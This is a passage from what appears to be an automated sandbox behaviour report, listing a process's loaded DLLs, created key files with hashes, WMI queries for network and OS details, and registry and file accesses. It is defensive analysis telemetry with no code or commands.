amsi.dll 0x7ffbf68c0000 0x7ffbf68cffff Memory Mapped File Readable, Writable, Executable False False False -
wmi2xml.dll 0x7ffbf7780000 0x7ffbf779bfff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x7ffbf77c0000 0x7ffbf77d2fff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x7ffbf8a40000 0x7ffbf8ad7fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffbf8ae0000 0x7ffbf8b47fff Memory Mapped File Readable, Writable, Executable True False False -
msxml3.dll 0x7ffbfc900000 0x7ffbfcb3efff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffbfe150000 0x7ffbfe19dfff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffc03cc0000 0x7ffc03cd3fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffc03d40000 0x7ffc03d5dfff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7ffc05ea0000 0x7ffc05eb5fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffc063e0000 0x7ffc06404fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffc06410000 0x7ffc06423fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffc06430000 0x7ffc06525fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffc06700000 0x7ffc0698dfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffc06b80000 0x7ffc06b90fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffc079e0000 0x7ffc07b97fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffc07e60000 0x7ffc07edefff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffc0ad10000 0x7ffc0ad19fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffc0b3b0000 0x7ffc0b3c4fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffc0c360000 0x7ffc0c3c6fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffc0c430000 0x7ffc0c43afff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffc0c8d0000 0x7ffc0c907fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffc0d740000 0x7ffc0dac1fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffc0f200000 0x7ffc0f2c7fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffc119f0000 0x7ffc11a11fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffc123a0000 0x7ffc12435fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffc12490000 0x7ffc12539fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ffc12bc0000 0x7ffc12cb3fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffc12f70000 0x7ffc12fe9fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffc13070000 0x7ffc13079fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffc132f0000 0x7ffc1334bfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffc13550000 0x7ffc13589fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffc13590000 0x7ffc135b6fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc13a90000 0x7ffc13a9ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc13bf0000 0x7ffc13c44fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc142c0000 0x7ffc14486fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc16550000 0x7ffc165f6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc16810000 0x7ffc16969fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffc16970000 0x7ffc169dafff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffc16fa0000 0x7ffc16fa7fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc17330000 0x7ffc1739efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 129 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05 0.08 KB MD5: 84440b4d05f45b1e94b2f53f7a581c0a
SHA1: 14dc680c6e0a010f1dbe9e635060128f7d567ec7
SHA256: 35361c9d54758eaf6b63855f5063fa44463e40854dc7561c3cad3ddf75834498
False
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05 2.20 KB MD5: c33b3b8b65e709d89cd6f0ac2f91f8f4
SHA1: f8e338ee94b8cdf41214ec66a9e853cbfe6ab8cb
SHA256: 1a8da512c75bb8ebeee40978fbea2c4f71e724f5cd83498e0714536d8a653787
False
Host Behavior
COM (25)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6 BFBF883A-CAD7-11D3-A11B-00105A1F515A cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create C1ABB475-F198-39D5-BF8D-330BC7189661 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
Fn
Create F5E692D9-8A87-349D-9657-F96E5799D2F4 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
Fn
Create 50369004-DB9A-3A75-BE7A-1D0EF017B9D3 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER False 1
Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 6
Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from WIN32_NEtWorKADaptERCOnFIgUraTiOn True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from Win32_OPERaTINgSyStem True 1
Fn
File (256)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\Wbem\WMIC.config type = file_attributes False 3
Fn
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info - type = file_type True 2
Fn
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open Mapping Global\netfxcustomperfcounters.1.0.net clr networking desired_access = FILE_MAP_WRITE True 1
Fn
Read - size = 4096, size_out = 4096 True 194
Fn
Data
Read - size = 4096, size_out = 972 True 1
Fn
Data
Read - size = 4096, size_out = 0 True 8
Fn
Read - size = 4096, size_out = 1480 True 1
Fn
Data
Read - size = 568, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 978 True 1
Fn
Data
Read - size = 4096, size_out = 214 True 1
Fn
Data
Read - size = 4096, size_out = 537 True 1
Fn
Data
Read - size = 4096, size_out = 3055 True 1
Fn
Data
Read - size = 17, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 452 True 1
Fn
Data
Read - size = 4096, size_out = 1668 True 1
Fn
Data
Read - size = 380, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (296)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 - True 1
Fn
Open Key HKEY_CURRENT_USER - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Fn
Open Key HKEY_CURRENT_USER - True 22
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 10
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 8
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 6
Fn
Open Key HKEY_CURRENT_USER - True 8
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 6
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 value_name = SchUseStrongCrypto, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
